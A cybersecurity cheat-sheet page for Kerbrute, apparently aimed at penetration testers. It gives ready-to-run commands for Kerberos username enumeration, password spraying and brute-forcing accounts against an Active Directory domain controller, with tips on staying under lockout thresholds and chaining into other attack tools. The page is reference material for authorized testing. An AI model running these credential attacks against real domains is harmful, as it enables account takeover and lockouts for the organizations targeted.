CyberCheatsheets

Kerbrute Cheat Sheet

Fast Kerberos user enumeration and password spraying without LDAP.

Active Directory & WindowsadenumkerberossprayUpdated 2026-06-02

Overview

Kerbrute abuses Kerberos pre-authentication to validate usernames and passwords against a domain controller—often without triggering standard LDAP lockouts on some configurations (still can lock accounts). Ethics: password spraying and user enumeration are active attacks; use only on domains in authorized scope with agreed spray policies.

Install

Release binary from GitHub (authorized use)

wget https://github.com/ropnop/kerbrute/releases/latest/download/kerbrute_linux_amd64
chmod +x kerbrute_linux_amd64
./kerbrute_linux_amd64

Essential commands

./kerbrute_linux_amd64 userenum -d corp.local --dc 10.10.10.1 users.txt
./kerbrute_linux_amd64 passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Password1!'
./kerbrute_linux_amd64 bruteuser -d corp.local --dc 10.10.10.1 j.doe passwords.txt

Common workflows

User enumeration —

./kerbrute userenum -d corp.local --dc 10.10.10.1 /usr/share/seclists/Usernames/xato-net-10k-usernames.txt -o valid_users.txt

Password spray (one password, many users) —

./kerbrute passwordspray -d corp.local --dc 10.10.10.1 valid_users.txt 'Spring2026!'

Single-user brute force (small list) —

./kerbrute bruteuser -d corp.local --dc 10.10.10.1 administrator passwords.txt

Threading and delay —

./kerbrute passwordspray -d corp.local --dc 10.10.10.1 users.txt 'Pass' --threads 10

Flags reference

userenum

Valid usernames via Kerberos

passwordspray

One password, many users

bruteuser

One user, many passwords

-d

Domain FQDN

--dc

Domain controller IP

-o

Output file

--threads

Concurrency

Tips

  • Ethics: one password per spray window; align with domain lockout threshold (often 5 in 30 min).
  • Kerberos userenum is quieter than LDAP anonymous bind on modern domains but still logged (4768/4771).
  • Valid users feed impacket-GetNPUsers, bloodhound, and nxc workflows.
  • Combine with enum4linux-ng / ldapdomaindump for full picture.

References

Chuletas relacionadas